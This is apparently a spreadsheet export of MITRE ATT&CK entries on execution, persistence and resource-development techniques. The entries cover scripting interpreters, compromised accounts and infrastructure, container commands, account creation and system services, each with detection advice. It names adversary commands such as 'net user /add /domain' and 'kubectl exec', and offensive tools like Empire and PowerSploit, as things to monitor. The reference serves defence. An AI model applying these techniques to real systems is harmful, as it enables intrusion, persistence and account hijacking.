Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through &lt;code&gt;osascript&lt;/code&gt; and usage of &lt;code&gt;OSAScript&lt;/code&gt; API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Network Device CLI</t>
  </si>
  <si>
    <t>Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH).
Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>20 October 2020</t>
  </si>
  <si>
    <t>Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</t>
  </si>
  <si>
    <t>Command: Command Execution</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the &lt;code&gt;Start-Process&lt;/code&gt; cmdlet which can be used to run an executable and the &lt;code&gt;Invoke-Command&lt;/code&gt; cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the &lt;code&gt;powershell.exe&lt;/code&gt; binary through interfaces to PowerShell's underlying &lt;code&gt;System.Management.Automation&lt;/code&gt; assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/001</t>
  </si>
  <si>
    <t>If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Python</t>
  </si>
  <si>
    <t>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the &lt;code&gt;python.exe&lt;/code&gt; interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/006</t>
  </si>
  <si>
    <t>Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts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</si>
  <si>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T1059.004</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Unix Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/004</t>
  </si>
  <si>
    <t xml:space="preserve">Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt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 </t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Visual Basic</t>
  </si>
  <si>
    <t>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/005</t>
  </si>
  <si>
    <t>Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: Windows Command Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. 
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/003</t>
  </si>
  <si>
    <t>Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</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</si>
  <si>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Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</t>
  </si>
  <si>
    <t>Drive: Drive Access, Drive: Drive Creation</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>Compromise Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Compromise Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>Compromise Client Software Binary</t>
  </si>
  <si>
    <t>Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.
Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. 
Consider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>Compromise Infrastructure: DNS Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Domains</t>
  </si>
  <si>
    <t>Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/001</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/004</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <t>T1584.006</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1584/006</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>Container Administration Command</t>
  </si>
  <si>
    <t>Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as &lt;code&gt;docker exec&lt;/code&gt; to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as &lt;code&gt;kubectl exec&lt;/code&gt;.(Citation: Kubectl Exec Get Shell)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1609</t>
  </si>
  <si>
    <t xml:space="preserve">Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. </t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Brad Geesaman, @bradgeesaman; Center for Threat-Informed Defense (CTID); David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.
These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t xml:space="preserve">Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.
Monitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. </t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Cluster: Cluster Metadata, Container: Container Enumeration, Container: Container Metadata, Pod: Pod Enumeration, Pod: Pod Metadata</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with account creation, such as &lt;code&gt;net user&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, User Account: User Account Creation</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC); Praetorian</t>
  </si>
  <si>
    <t>T1136.003</t>
  </si>
  <si>
    <t>Create Account: Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/003</t>
  </si>
  <si>
    <t>29 January 2020</t>
  </si>
  <si>
    <t>Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>User Account: User Account Creation</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>Create Account: Domain Account</t>
  </si>
  <si>
    <t>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the &lt;code&gt;net user /add /domain&lt;/code&gt; command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/002</t>
  </si>
  <si>
    <t>28 January 2020</t>
  </si>
  <si>
    <t>23 March 2020</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with domain account creation, such as &lt;code&gt;net user /add /domain&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>Create Account: Local Account</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/001</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with local account creation, such as &lt;code&gt;net user /add&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) 
Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  
Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1543</t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.  
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
